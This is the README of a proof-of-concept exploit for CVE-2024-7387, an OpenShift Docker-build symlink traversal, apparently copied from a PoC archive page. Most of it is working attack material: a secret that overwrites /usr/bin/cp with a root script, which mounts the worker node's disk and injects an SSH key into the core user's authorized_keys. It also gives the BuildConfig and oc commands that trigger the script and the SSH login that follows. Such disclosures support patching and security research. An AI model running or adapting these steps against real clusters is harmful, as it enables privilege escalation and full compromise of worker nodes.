来源

关联漏洞

描述

poc for path traversal allowing privilege escalation from developer to worker node

介绍

### overview

[cve-2024-7387](https://nvd.nist.gov/vuln/detail/CVE-2024-7387) is a symlink traversal vulnerability in openshift's docker build strategy that allows attackers to overwrite system binaries in privileged build containers. by mounting a secret to a symbolic link pointing to `/usr/bin`, malicious files can replace legitimate system commands like `cp`. when openshift internally uses these compromised binaries during the build process, arbitrary code executes with root privileges, enabling full host compromise through SSH key injection into the worker node.

### exploit

clone the repository containing the vulnerable configuration:

```shell
git clone https://github.com/0xSigSegv0x00/cve-2024-7387.git
cd cve-2024-7387
```

the repository contains a `Dockerfile` that copies the build context, lists its contents, & displays the payload output:

```Dockerfile
FROM fedora:latest
COPY . .
RUN ls -la && cat pwn.txt
```

>in openshift's docker build strategy, the build context is mounted at `/tmp/build/inputs/` inside the privileged build container. `COPY . .` copies everything from this location into the image.

it also includes a symbolic link `usr_bin` pointing to `/usr/bin`, which will be exploited to overwrite system binaries.

create a secret containing the malicious bash payload named `cp`:

```yaml
# malicious-secret.yaml
kind: Secret
apiVersion: v1
metadata:
  name: malicious-secret
stringData:
  # creates a file named `cp` that runs inside a privileged container
  cp: |
    #!/bin/bash
    {
      echo "USER:"
      whoami                                                                                             # checks if we are `root` in container
      
      echo -e "\nMOUNTING HOST FILESYSTEM..."
      mkdir -p /mnt/h                                                                                    # creates a dir to mount the host disk
      mount /dev/vda4 /mnt/h 2>&1                                                                        # mounts the cluster host's drive
      
      echo -e "\nADDING SSH KEY TO CORE USER..."
      ssh-keygen -t ed25519 -f /tmp/exploit_key -N "" -q                                                 # generates ed25519 SSH key pair without passphrase
      mkdir -p /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh                                     # creates .ssh dir for core user
      cat /tmp/exploit_key.pub >> /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys  # adds public key to `authorized_keys`
      chmod 600 /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys                    # sets correct permissions
      chown 1000:1000 /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys              # sets ownership to core user (uid 1000)
      
      echo -e "\nPRIVATE SSH KEY:"
      cat /tmp/exploit_key                                                                               # outputs private key for SSH authentication
      
      echo -e "\nPUBLIC SSH KEY:"
      cat /tmp/exploit_key.pub                                                                           # outputs public key for verification
    } > /tmp/build/inputs/pwn.txt 2>&1
    exit 0
type: Opaque
```

apply the secret:

```bash
oc apply -f malicious-secret.yaml
```

>the `cp` key in the secret will create a file named `cp`. when mounted via `destinationDir: usr_bin` (a symlink to `/usr/bin`), this file overwrites the legitimate `/usr/bin/cp` binary with the malicious script.

create a trigger secret:

```yaml
# trigger-secret.yaml
kind: Secret
apiVersion: v1
metadata:
  name: trigger-secret
stringData:
  trigger: pwned
type: Opaque
```

apply the trigger secret:

```bash
oc apply -f trigger-secret.yaml
```

>the secret will trigger openshift to use the `cp` command internally when mounting it, executing the malicious payload.

create the `BuildConfig` that mounts both secrets:

```yaml
# malicious-build-config.yaml
kind: BuildConfig
apiVersion: build.openshift.io/v1
metadata:
  name: malicious-build-config
spec:
  nodeSelector: null
  strategy:
    type: Docker
    dockerStrategy:
      dockerfilePath: Dockerfile
  source:
    type: Git
    git:
      uri: 'https://github.com/0xSigSegv0x00/cve-2024-7387.git'
      ref: main
    contextDir: /
    secrets:
      - secret:
          name: malicious-secret  # mounts to symlink path
        destinationDir: usr_bin
      - secret:
          name: trigger-secret    # mounts to root of build context
```

>the `destinationDir: usr_bin` mounts the secret at `/tmp/build/inputs/usr_bin` & since `usr_bin` is a symlink to `/usr/bin`, the secret's `cp` file overwrites `/usr/bin/cp`. the trigger-secret mounts to the build context root, & when openshift copies it using the `cp` command, the malicious `/usr/bin/cp` script executes instead.

apply the build configuration:

```bash
oc apply -f malicious-build-config.yaml
```

start the build to execute the payload:

```shell
oc start-build malicious-build-config
```

check the build logs to verify the payload executed:

```shell
oc logs -f build/malicious-build-config-1
```

>the contents of `pwn.txt` displayed in the build logs confirm the malicious script executed successfully & contain the private SSH key needed for host access.

save the private key from the build logs, set correct permissions, & establish SSH connection to the worker node:

```shell
chmod 600 exploit_key
ssh -i exploit_key core@WORKER_IP
```

文件快照

 [4.0K]  /data/pocs/781d54341d0e925a5ea3dec3ccc458494dfa58cb
├── [  53]  Dockerfile
├── [5.4K]  README.md
└── [   8]  usr_bin -> /usr/bin

1 directory, 2 files

备注